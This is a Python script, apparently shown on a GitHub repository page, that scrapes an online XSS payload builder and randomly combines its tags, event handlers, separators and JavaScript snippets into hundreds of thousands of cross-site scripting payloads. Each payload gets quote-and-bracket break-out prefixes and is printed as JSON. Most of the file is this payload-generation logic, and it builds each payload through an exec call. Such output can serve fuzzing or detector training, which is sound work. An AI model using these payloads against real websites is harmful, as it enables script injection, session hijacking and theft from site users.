-
Notifications
You must be signed in to change notification settings - Fork 6
/
xssgun.py
executable file
·71 lines (63 loc) · 2.11 KB
/
xssgun.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
#!/usr/bin/env python
import os
import sys
import json
import pathlib
import requests
import time
import random
import itertools
from functools import partial
from pprint import pprint
from pyquery import PyQuery as pq
p = pathlib.Path('webgun.html')
if not p.exists():
url = 'https://brutelogic.com.br/webgun/'
r = requests.get(url)
p.write_text(r.text)
pageq = pq(p.read_text())
def get_options(name, remove_empty=False):
options = pageq(f'select[name={name}]')
options = pq(options)('option')
options = list(options.map(lambda i,e:pq(e).attr('value')))
if remove_empty:
options = list(filter(lambda x:not x=='', options))
return options
extra1s = get_options('extra1')
tags = get_options('tag', remove_empty=True)
s1s = get_options('s1')
extra2s = get_options('extra2')
s2s = get_options('s2')
handlers = get_options('handler', remove_empty=True)
s3s = get_options('s3')
s4s = get_options('s4')
jss = get_options('js', remove_empty=True)
s5s = get_options('s5')
extra3s = get_options('extra3')
payload_format = '{extra1}<{tag}{s1}{extra2}{s2}{handler}{s3}={s4}{js}{s5}>{extra3}'
lists = (extra1s, tags, s1s, extra2s, s2s, handlers, s3s, s4s, jss, s5s, extra3s)
for i in range(500000):
extra1, tag, s1, extra2, s2, handler, s3, s4, js, s5, extra3 = list(map(random.choice, lists))
if (not s1):
s1 = ' '
if extra2 and (not s2):
s2 = ' '
s = f'payload=f\'{payload_format}\''
exec(s, globals(), locals())
for prefix in ['', '">', "'>", '>']:
prefix_payload = prefix+payload
d = {
'payload': prefix_payload,
}
print(json.dumps(d))
#generate all payloads, but this take too much time and disk space
#for extra1, tag, s1, extra2, s2, handler, s3, s4, js, s5, extra3 in itertools.product(extra1s, tags, s1s, extra2s, s2s, handlers, s3s, s4s, jss, s5s, extra3s):
# if (not s1):
# s1 = ' '
# if extra2 and (not s2):
# s2 = ' '
# s = f'payload=f\'{payload_format}\''
# exec(s, globals(), locals())
# for prefix in ['', '">', "'>", '>']:
# prefix_payload = prefix+payload
# print(prefix_payload)